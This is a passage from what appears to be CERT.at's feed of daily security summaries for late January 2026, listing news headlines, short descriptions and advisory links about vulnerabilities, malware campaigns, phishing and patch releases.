&lt;h3&gt;Multiple Microsoft Office products vulnerable to untrusted search path&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://jvn.jp/en/jp/JVN04984838/&quot;&gt;https://jvn.jp/en/jp/JVN04984838/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Sonatype Nexus Repository vulnerable to server-side request forgery&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://jvn.jp/en/jp/JVN64861120/&quot;&gt;https://jvn.jp/en/jp/JVN64861120/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;OS command injection in raspap-webgui&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://jvn.jp/en/jp/JVN27202136/&quot;&gt;https://jvn.jp/en/jp/JVN27202136/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ZDI-26-050: GIMP ICO File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;http://www.zerodayinitiative.com/advisories/ZDI-26-050/&quot;&gt;http://www.zerodayinitiative.com/advisories/ZDI-26-050/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;AI bot: OpenClaw (Moltbot) with high-risk code-smuggling vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/KI-Bot-OpenClaw-Moltbot-mit-hochriskanter-Codeschmuggel-Luecke-11161705.html&quot;&gt;https://www.heise.de/news/KI-Bot-OpenClaw-Moltbot-mit-hochriskanter-Codeschmuggel-Luecke-11161705.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Multiple vulnerabilities in Native Instruments Native Access (MacOS)&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-native-instruments-native-access-macos/&quot;&gt;https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-native-instruments-native-access-macos/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CVE-2025-60021 (CVSS 9.8): command injection in Apache bRPC heap profiler&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cyberark.com/resources/threat-research-blog/cve-2025-60021-cvss-9-8-command-injection-in-apache-brpc-heap-profiler&quot;&gt;https://www.cyberark.com/resources/threat-research-blog/cve-2025-60021-cvss-9-8-command-injection-in-apache-brpc-heap-profiler&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-02T19:51:16Z</dc:date></entry><entry><title>Tageszusammenfassung - 30.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-30012026"/><author><name>CERT.at</name></author><updated>2026-01-30T18:20:59Z</updated><published>2026-01-30T18:20:59Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Donnerstag 29-01-2026 18:00 - Freitag 30-01-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Michael Schlagenhaufer


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Someone Knows Bash Far Too Well, And We Love It (Ivanti EPMM Pre-Auth RCEs CVE-2026-1281 &amp; CVE-2026-1340)&lt;/h3&gt;

When Ivanti removed the embargoes from CVE-2026-1281 and CVE-2026-1340 - pre-auth Remote Command Execution vulnerabilities in Ivanti's Endpoint Manager Mobile (EPMM) solution - we sighed with relief. Clearly, the universe had decided to continue mocking Secure-By-Design signers right on schedule - every January. [..] As we are always keen to remind everyone, today's blog post didn't ruin your weekend. Firstly, the APT currently exploiting these vulnerabilities, and secondly, your lack of response to the warnings from Ivanti and CISA did.
&lt;p /&gt;
&lt;A HREF=&quot;https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/&quot;&gt;https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hugging Face abused to spread thousands of Android malware variants&lt;/h3&gt;

A new Android malware campaign is using the Hugging Face platform as a repository for thousands of variations of an APK payload that collects credentials for popular financial and payment services.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hugging-face-abused-to-spread-thousands-of-android-malware-variants/&quot;&gt;https://www.bleepingcomputer.com/news/security/hugging-face-abused-to-spread-thousands-of-android-malware-variants/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft fixes Outlook bug blocking access to encrypted emails&lt;/h3&gt;

Microsoft has fixed a known issue that prevented Microsoft 365 customers from opening encrypted emails in classic Outlook after a recent update.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-bug-blocking-access-to-encrypted-emails/&quot;&gt;https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-outlook-bug-blocking-access-to-encrypted-emails/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Undocumented &quot;TelnetEnable&quot; functionality of End of Service NETGEAR products&lt;/h3&gt;

Some end of service NETGEAR products provide &quot;TelnetEnable&quot; functionality, which allows a magic packet to activate telnet service on the box. [..] Stop using the end of service products, including NETGEAR PR2000.
&lt;p /&gt;
&lt;A HREF=&quot;https://jvn.jp/en/jp/JVN46722282/&quot;&gt;https://jvn.jp/en/jp/JVN46722282/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Researchers Find 175,000 Publicly Exposed Ollama AI Servers Across 130 Countries&lt;/h3&gt;

Ollama is an open-source framework that allows users to easily download, run, and manage large language models (LLMs) locally on Windows, macOS, and Linux. While the service binds to the localhost address at 127.0.0[.]1:11434 by default, it's possible to expose it to the public internet by means of a trivial change: configuring it to bind to 0.0.0[.]0 or a public interface. The fact that Ollama, like the recently popular Moltbot (formerly Clawdbot), is hosted locally and operates outside of the enterprise security perimeter, poses new security concerns.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/researchers-find-175000-publicly.html&quot;&gt;https://thehackernews.com/2026/01/researchers-find-175000-publicly.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ShadowHS: A Fileless Linux Post-Exploitation Framework Built on a Weaponized hackshell&lt;/h3&gt;

Cyble Research &amp; Intelligence Labs (CRIL) has identified a Linux intrusion chain leveraging a highly obfuscated, fileless loader that deploys a weaponized variant of hackshell entirely from memory. Cyble tracks this activity under the name ShadowHS, reflecting its fileless execution model and lineage from the original hackshell utility.
&lt;p /&gt;
&lt;A HREF=&quot;https://cyble.com/blog/shadowhs-fileless-linux-post-exploitation-framework/&quot;&gt;https://cyble.com/blog/shadowhs-fileless-linux-post-exploitation-framework/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;US cybersecurity chief uploads confidential documents to ChatGPT&lt;/h3&gt;

Apparently the boss, of all people, had obtained an exemption permitting use of the tool and promptly acted negligently with it.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.derstandard.at/story/3000000306469/cybersicherheitschef-der-usa-laedt-vertrauliche-dokumente-bei-chatgpt-hoch&quot;&gt;https://www.derstandard.at/story/3000000306469/cybersicherheitschef-der-usa-laedt-vertrauliche-dokumente-bei-chatgpt-hoch&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Arsink Spyware Posing as WhatsApp, YouTube, Instagram, TikTok Hits 143 Countries&lt;/h3&gt;

The interesting thing about this campaign is that hackers are not using the official Google Play Store to spread this, but posting links on Telegram and Discord or using the file-sharing site MediaFire. [..] They basically offer 'Pro' or 'Mod' versions of these apps, promising special features that the real apps don't have. But, as soon as you download one, the app immediately asks for a long list of permissions.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/arsink-spyware-whatsapp-youtube-instagram-tiktok/&quot;&gt;https://hackread.com/arsink-spyware-whatsapp-youtube-instagram-tiktok/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security updates for Friday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (curl, gimp:2.8, glibc, grafana, grafana-pcp, kernel, osbuild-composer, php:8.3, python-urllib3, python3.11, and python3.12), Debian (chromium), Mageia (ceph, gpsd, libxml2, openjdk, openssl, and xen), SUSE (abseil-cpp, assertj-core, coredns, freerdp, java-11-openjdk, java-25-openjdk, libxml2, openssl-1_0_0, openssl-1_1, python, python-filelock, and python311-sse-starlette), and Ubuntu (kernel, linux, linux-aws, linux-aws-hwe, linux-hwe, linux-kvm, linux-oracle, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-aws-fips, linux-fips, linux-fips, and texlive-bin).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1056692/&quot;&gt;https://lwn.net/Articles/1056692/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical vulnerabilities in Ivanti Endpoint Manager Mobile - updates recommended&lt;/h3&gt;

Ivanti has published a security advisory regarding critical vulnerabilities in Endpoint Manager Mobile. These vulnerabilities are already being actively exploited. They allow a remote, unauthenticated attacker to execute arbitrary code on the affected system (Remote Code Execution), which permits complete compromise of the server. CVE-2026-1281, CVE-2026-1340
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/de/warnungen/2026/1/kritische-schwachstellen-in-ivanti-endpoint-manager-mobile-updates-empfohlen&quot;&gt;https://www.cert.at/de/warnungen/2026/1/kritische-schwachstellen-in-ivanti-endpoint-manager-mobile-updates-empfohlen&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;BoidCMS v2.1.2 Apache .htaccess Rule Bypass Leading to Information Disclosure&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://cxsecurity.com/issue/WLB-2026010019&quot;&gt;https://cxsecurity.com/issue/WLB-2026010019&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Lexmark Security Advisory&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.lexmark.com/content/dam/support/collateral/security-alerts/CVE-2025-65083.pdf&quot;&gt;https://www.lexmark.com/content/dam/support/collateral/security-alerts/CVE-2025-65083.pdf&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;KiloView Encoder Series&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-029-01&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-029-01&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Rockwell Automation ArmorStart LT&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-029-02&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-029-02&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Rockwell Automation ControlLogix&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-029-03&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-029-03&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-30T18:20:59Z</dc:date></entry><entry><title>Tageszusammenfassung - 29.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-29012026"/><author><name>CERT.at</name></author><updated>2026-01-29T18:29:40Z</updated><published>2026-01-29T18:29:40Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Mittwoch 28-01-2026 18:00 - Donnerstag 29-01-2026 18:00
Handler:     Alexander Riepl
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Aisuru botnet sets new record with 31.4 Tbps DDoS attack&lt;/h3&gt;

The Aisuru/Kimwolf botnet launched a new massive distributed denial of service (DDoS) attack that peaked at 31.4 Tbps and 200 million requests per second, setting a new record.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/aisuru-botnet-sets-new-record-with-314-tbps-ddos-attack/&quot;&gt;https://www.bleepingcomputer.com/news/security/aisuru-botnet-sets-new-record-with-314-tbps-ddos-attack/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;So much for virus protection: malware distributed via update server of antivirus tool&lt;/h3&gt;

Attackers smuggled malware onto user systems via the antivirus tool eScan. One of the vendor's update servers had been compromised.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/von-wegen-virenschutz-malware-ueber-update-server-von-antivirus-tool-verteilt-2601-204754.html&quot;&gt;https://www.golem.de/news/von-wegen-virenschutz-malware-ueber-update-server-von-antivirus-tool-verteilt-2601-204754.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;There's a Rash of Scam Spam Coming From a Real Microsoft Address&lt;/h3&gt;

There are reports that a legitimate Microsoft email address -- which Microsoft explicitly says customers should add to their allow list -- is delivering scam spam.
&lt;p /&gt;
&lt;A HREF=&quot;https://it.slashdot.org/story/26/01/28/1849206/theres-a-rash-of-scam-spam-coming-from-a-real-microsoft-address?utm_source=rss1.0mainlinkanon&amp;utm_medium=feed&quot;&gt;https://it.slashdot.org/story/26/01/28/1849206/theres-a-rash-of-scam-spam-coming-from-a-real-microsoft-address?utm_source=rss1.0mainlinkanon&amp;utm_medium=feed&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ransomware crims forced to take off-RAMP as FBI seizes forum&lt;/h3&gt;

Ransomware crims have just lost one of their best business platforms. US law enforcement has seized the notorious RAMP cybercrime forum's dark web and clearnet domains.
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2026/01/28/fbi_seizes_ramp_forum/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2026/01/28/fbi_seizes_ramp_forum/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Patch or perish: Vulnerability exploits now dominate intrusions&lt;/h3&gt;

Apply fixes within a few hours or face the music, say the pros.
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2026/01/29/faster_patching_please_cry_infoseccers/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2026/01/29/faster_patching_please_cry_infoseccers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ConsentFix (a.k.a. AuthCodeFix): Detecting OAuth2 Authorization Code Phishing&lt;/h3&gt;

ConsentFix (a.k.a. AuthCodeFix) is the latest variant of the fix-type phishing attacks, initially identified by Push Security. In this technique, the adversary tricks the victim into generating an OAuth authorization code that is part of a localhost URL by signing in to the Azure CLI instance (or other vulnerable applications). Then, the victim is instructed to copy that URL and paste it into a phishing website, essentially handing over the authorization code to the adversary, who is now able to exchange it for an access token. Using the access token, the adversary gets access to the victim's Microsoft account.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.nviso.eu/2026/01/29/consentfix-a-k-a-authcodefix-detecting-oauth2-authorization-code-phishing/&quot;&gt;https://blog.nviso.eu/2026/01/29/consentfix-a-k-a-authcodefix-detecting-oauth2-authorization-code-phishing/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Dissecting UAT-8099: New persistence mechanisms and regional focus&lt;/h3&gt;

Cisco Talos observed new activity from UAT-8099 spanning from August 2025 through early 2026. Analysis of Cisco's file census and DNS traffic indicates that compromised IIS servers are located across India, Pakistan, Thailand, Vietnam, and Japan, with a distinct concentration of attacks in Thailand and Vietnam. Furthermore, this activity significantly overlaps with the WEBJACK campaign; we have identified high-confidence correlations across malware hashes, C2 infrastructure, victimology, and the promoted gambling sites.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.talosintelligence.com/uat-8099-new-persistence-mechanisms-and-regional-focus/&quot;&gt;https://blog.talosintelligence.com/uat-8099-new-persistence-mechanisms-and-regional-focus/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious Google Ads Target Mac Users with Fake Mac Cleaner Pages&lt;/h3&gt;

Researchers at MacKeeper have found malicious Google Ads for &quot;Mac cleaner&quot; tools that trick users into running dangerous Terminal commands. Stay safe by learning how to spot these fake Apple sites.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/malicious-google-ads-mac-fake-mac-cleaner/&quot;&gt;https://hackread.com/malicious-google-ads-mac-fake-mac-cleaner/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Unveiling the Weaponized Web Shell EncystPHP&lt;/h3&gt;

FortiGuard Labs has discovered a web shell that we named &quot;EncystPHP.&quot; It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December last year and propagated via exploitation of the FreePBX vulnerability CVE-2025-64328.
&lt;p /&gt;
&lt;A HREF=&quot;https://feeds.fortinet.com/~/943094408/0/fortinet/blogs~Unveiling-the-Weaponized-Web-Shell-EncystPHP&quot;&gt;https://feeds.fortinet.com/~/943094408/0/fortinet/blogs~Unveiling-the-Weaponized-Web-Shell-EncystPHP&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Nvidia security vulnerabilities: attacks on GPU drivers can cause crashes&lt;/h3&gt;

Software vulnerabilities put PCs with Nvidia graphics cards at risk. Security patches are available.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Nvidia-Sicherheitsluecken-Attacken-auf-GPU-Treiber-koennen-zu-Abstuerzen-fuehren-11158836.html&quot;&gt;https://www.heise.de/news/Nvidia-Sicherheitsluecken-Attacken-auf-GPU-Treiber-koennen-zu-Abstuerzen-fuehren-11158836.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Thursday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (java-25-openjdk, openssl, and python3.9), Debian (gimp, libmatio, pyasn1, and python-django), Fedora (perl-HarfBuzz-Shaper, python-tinycss2, and weasyprint), Mageia (glib2.0), Oracle (curl, fence-agents, gcc-toolset-15-binutils, glibc, grafana, java-1.8.0-openjdk, kernel, mariadb, osbuild-composer, perl, php:8.2, python-urllib3, python3.11, python3.11-urllib3, python3.12, and python3.12-urllib3), SUSE (alloy, avahi, bind, buildah, busybox, container-suseconnect, coredns, gdk-pixbuf, gimp, go1.24, go1.24-openssl, go1.25, helm, kernel, kubernetes, libheif, libpcap, libpng16, openjpeg2, openssl-1_0_0, openssl-1_1, openssl-3, php8, python-jaraco.context, python-marshmallow, python-pyasn1, python-urllib3, python-virtualenv, python311, python313, rabbitmq-server, xen, zli, and zot-registry), and Ubuntu (containerd, containerd-app and wlc). 
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1056544/&quot;&gt;https://lwn.net/Articles/1056544/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ZDI-26-049: Delta Electronics DIAView Exposed Dangerous Method Remote Code Execution Vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;http://www.zerodayinitiative.com/advisories/ZDI-26-049/&quot;&gt;http://www.zerodayinitiative.com/advisories/ZDI-26-049/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ZDI-26-048: Fortinet FortiSandbox fortisandbox Server-Side Request Forgery Remote Code Execution Vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;http://www.zerodayinitiative.com/advisories/ZDI-26-048/&quot;&gt;http://www.zerodayinitiative.com/advisories/ZDI-26-048/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ZDI-26-047: Hancom Office DOC File Parsing Type Confusion Remote Code Execution Vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;http://www.zerodayinitiative.com/advisories/ZDI-26-047/&quot;&gt;http://www.zerodayinitiative.com/advisories/ZDI-26-047/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ZDI-26-046: Cisco Snort _bnfa_search_csparse_nfa Use-After-Free Remote Code Execution Vulnerability&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;http://www.zerodayinitiative.com/advisories/ZDI-26-046/&quot;&gt;http://www.zerodayinitiative.com/advisories/ZDI-26-046/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-29T18:29:40Z</dc:date></entry><entry><title>Tageszusammenfassung - 28.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-28012026"/><author><name>CERT.at</name></author><updated>2026-01-28T19:17:19Z</updated><published>2026-01-28T19:17:19Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Tuesday 27-01-2026 18:00 - Wednesday 28-01-2026 18:30
Handler:     Felician Fuchs
Co-Handler:  Alexander Riepl


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Fortinet blocks exploited FortiCloud SSO zero day until patch is ready&lt;/h3&gt;

Fortinet has confirmed a new, actively exploited critical FortiCloud single sign-on (SSO) authentication bypass vulnerability, tracked as CVE-2026-24858, and says it has mitigated the zero-day attacks by blocking FortiCloud SSO connections from devices running vulnerable firmware versions.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/fortinet-blocks-exploited-forticloud-sso-zero-day-until-patch-is-ready/&quot;&gt;https://www.bleepingcomputer.com/news/security/fortinet-blocks-exploited-forticloud-sso-zero-day-until-patch-is-ready/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Slovakian man pleads guilty to operating darknet marketplace&lt;/h3&gt;

A Slovakian national admitted on Tuesday to helping operate a darknet marketplace that sold narcotics, cybercrime tools and services, fake government IDs, and stolen personal information for more than two years.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/slovakian-man-pleads-guilty-to-operating-kingdown-market-cybercrime-marketplace/&quot;&gt;https://www.bleepingcomputer.com/news/security/slovakian-man-pleads-guilty-to-operating-kingdown-market-cybercrime-marketplace/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hackers hijack exposed LLM endpoints in Bizarre Bazaar operation&lt;/h3&gt;

A malicious campaign is actively targeting exposed LLM (Large Language Model) service endpoints to commercialize unauthorized access to AI infrastructure.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hackers-hijack-exposed-llm-endpoints-in-bizarre-bazaar-operation/&quot;&gt;https://www.bleepingcomputer.com/news/security/hackers-hijack-exposed-llm-endpoints-in-bizarre-bazaar-operation/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Vibe-Coded Sicarii Ransomware Can't Be Decrypted&lt;/h3&gt;

A new ransomware strain that entered the scene last year has poorly designed code and an odd &quot;Hebrew&quot; identity that might be a false flag.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/endpoint-security/vibe-coded-sicarii-ransomware-decrypted&quot;&gt;https://www.darkreading.com/endpoint-security/vibe-coded-sicarii-ransomware-decrypted&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;WhatsApp Rolls Out Lockdown-Style Security Mode to Protect Targeted Users From Spyware&lt;/h3&gt;

Meta on Tuesday announced it's adding Strict Account Settings on WhatsApp to secure certain users against advanced cyber attacks because of who they are and what they do.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/whatsapp-rolls-out-lockdown-style.html&quot;&gt;https://thehackernews.com/2026/01/whatsapp-rolls-out-lockdown-style.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake Python Spellchecker Packages on PyPI Delivered Hidden Remote Access Trojan&lt;/h3&gt;

Cybersecurity researchers have discovered two malicious packages in the Python Package Index (PyPI) repository that masquerade as spellcheckers but contain functionality to deliver a remote access trojan (RAT).
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/fake-python-spellchecker-packages-on.html&quot;&gt;https://thehackernews.com/2026/01/fake-python-spellchecker-packages-on.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Mustang Panda Deploys Updated COOLCLIENT Backdoor in Government Cyber Attacks&lt;/h3&gt;

Threat actors with ties to China have been observed using an updated version of a backdoor called COOLCLIENT in cyber espionage attacks in 2025 to facilitate comprehensive data theft from infected endpoints.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/mustang-panda-deploys-updated.html&quot;&gt;https://thehackernews.com/2026/01/mustang-panda-deploys-updated.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;One-of-a-kind leather goods from &quot;maronellis.com&quot;: all a scam!&lt;/h3&gt;

As soon as advertisements tell of a small family business that unfortunately has to close, caution is warranted. Especially when a supposed news report shows the great rush for the last handmade one-of-a-kind pieces. How problematic online shops work and how the criminals lure their victims - an analysis using the example of &quot;maronellis.com&quot;.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/leder-unikate-maronelliscom/&quot;&gt;https://www.watchlist-internet.at/news/leder-unikate-maronelliscom/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Open source instead of Big Tech: France wants to get rid of Microsoft Teams, Zoom and co.&lt;/h3&gt;

Visio is leaving its pilot phase and is to be used by 200,000 civil servants by 2027. The pursuit of sovereignty, but also cost savings, provide the motivation.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.derstandard.at/story/3000000306024/open-source-statt-big-tech-frankreich-will-microsoft-teams-zoom-und-co-loswerden&quot;&gt;https://www.derstandard.at/story/3000000306024/open-source-statt-big-tech-frankreich-will-microsoft-teams-zoom-und-co-loswerden&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;EU demands that Android be opened up to other AI - within six months&lt;/h3&gt;

The exclusive, deep integration of Gemini into the operating system is said to violate the Digital Markets Act. The EU also wants Google to hand over search data to competitors.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.derstandard.at/story/3000000306105/eu-fordert-oeffnung-von-android-fuer-andere-ki-innerhalb-von-sechs-monaten&quot;&gt;https://www.derstandard.at/story/3000000306105/eu-fordert-oeffnung-von-android-fuer-andere-ki-innerhalb-von-sechs-monaten&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Wave of attacks on journalists via the Signal messenger&lt;/h3&gt;

Other civil-society actors are affected as well. A malicious phishing message demands &quot;verification&quot; because of &quot;suspicious activity&quot;.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.derstandard.at/story/3000000306125/angriffswelle-auf-journalisten-ueber-signal-messenger&quot;&gt;https://www.derstandard.at/story/3000000306125/angriffswelle-auf-journalisten-ueber-signal-messenger&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Beware! Fake ChatGPT browser extensions are stealing your login credentials&lt;/h3&gt;

If you've installed a browser extension to enhance your ChatGPT experience, you might want to think again. Read more in my article on the Hot for Security blog.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bitdefender.com/en-us/blog/hotforsecurity/beware-fake-chatgpt-browser-extensions-are-stealing-your-login-credentials&quot;&gt;https://www.bitdefender.com/en-us/blog/hotforsecurity/beware-fake-chatgpt-browser-extensions-are-stealing-your-login-credentials&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cyberattack on Poland's power grid hit around 30 facilities, new report says&lt;/h3&gt;

Adding to previous research about an operation against Poland's electrical grid, analysts at Dragos say it affected dozens of facilities and disrupted operational technology.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/poland-electrical-grid-cyberattack-30-facilities-affected&quot;&gt;https://therecord.media/poland-electrical-grid-cyberattack-30-facilities-affected&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Exchange Online: Microsoft postpones SMTP AUTH Basic Authentication shutdown&lt;/h3&gt;

Microsoft originally intended to end support for Basic Authentication with client submission (SMTP AUTH) in Exchange Online as early as September 2025. It was then said that the feature would be retired gradually between 1 March 2026 and 30 April 2026.
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/01/28/exchange-online-microsoft-verschiebt-smtp-auth-basic-authentication-abschaltung/&quot;&gt;https://borncity.com/blog/2026/01/28/exchange-online-microsoft-verschiebt-smtp-auth-basic-authentication-abschaltung/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ShinyHunters Target 100+ Firms Using Phone Calls to Bypass SSO Security&lt;/h3&gt;

ShinyHunters is driving attacks on 100+ organisations, using vishing and fake login pages with allied groups to bypass SSO and steal company data, reports Silent Push.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/shinyhunters-target-firms-bypass-sso-security/&quot;&gt;https://hackread.com/shinyhunters-target-firms-bypass-sso-security/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Russian Cybercrime Platform RAMP Forum Seized by Feds&lt;/h3&gt;

US authorities have seized the RAMP cybercrime forum, taking down both its clearnet and dark web domains in a major hit to the ransomware infrastructure.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/russian-cybercrime-ramp-forum-seized-feds/&quot;&gt;https://hackread.com/russian-cybercrime-ramp-forum-seized-feds/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;OpenSSL January 2026 Security Update: CMS and PKCS#12 Buffer Overflows&lt;/h3&gt;

A deep dive into OpenSSL's January 2026 CMS and PKCS#12 vulnerabilities, including a pre-auth stack overflow and a PKCS#12 parsing bug.
&lt;p /&gt;
&lt;A HREF=&quot;https://securitylabs.datadoghq.com/articles/openssl-january-2026-security-update-cms-and-pkcs12-buffer-overflows/&quot;&gt;https://securitylabs.datadoghq.com/articles/openssl-january-2026-security-update-cms-and-pkcs12-buffer-overflows/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Administrative FortiCloud SSO authentication bypass&lt;/h3&gt;

